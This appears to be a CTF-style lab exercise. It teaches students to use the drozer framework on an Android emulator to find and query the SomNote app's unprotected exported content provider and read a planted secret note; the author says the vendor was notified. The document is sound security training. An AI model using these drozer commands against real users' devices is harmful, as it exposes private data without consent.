M 503: SomNote Vulnerable Content Provider (15 pts)

What You Need for This Project

An Android emulator connected to Drozer, which you prepared in a previous project

Purpose

To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page.

Drozer allows you to audit IPC endpoints.

Somnote

Install the app, as shown below.

If you can't get the app from Google Play, download my archived copy.

Click "LOGIN WITH EMAIL", and enter any email and password, and click the Login button.

Responsible Disclosure

I notified SomCloud of problems years ago:

Somnote

Putting a Secret into Somnote

On your Android device, launch Somnote.

If it asks for permissions, grant them.

In the login screen, as shown below, at the top right, click X.

A "VIP Previliges" box appears. At the top right, click X to close it.

Click "Get started with SomNote", as shown below.

On the next screen, at the top right, click the + sign.

Type in a secret message, as shown below, and click Save.

At the lower right of your Android device, click the square button.

Close SomNote.

Attacking SomNote with Drozer

Retrieving Package Information

On Kali, at the dz> prompt, execute these commands:

adb forward tcp:31415 tcp:31415 drozer console connect run app.package.list -f som

Drozer finds the path to the somnote app, which is

com.somcloud.somnote

as shown below.

Identifying the Attack Surface

To see what vulnerabilities are exposed through Android’s built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:

run app.package.attacksurface com.somcloud.somnote

There are a lot of exported items, as shown below.

Reading from the Content Provider

On Kali, at the dz> prompt, execute this command:

run app.provider.info -a com.somcloud.somnote

The content provider's name is shown, and the fact that no permissions are required to read from it, as shown below.

Finding URIs

On Kali, at the dz> prompt, execute this command:

run scanner.provider.finduris -a com.somcloud.somnote

Drozer finds four URIs, as shown below.

Querying the Content Provider

On Kali, at the dz> prompt, execute this command:

run app.provider.query content://com.somcloud.provider.SomNote/notes/

Drozer finds the secret information, as shown below.

M 503.1: Recording Your Success (15 pts)
Find the text covered by a green box in the image above. That's the flag.

Sources

Drozer
drozer user guide

Converted to a CTF 2-28-19
Updated in small ways 2-17-21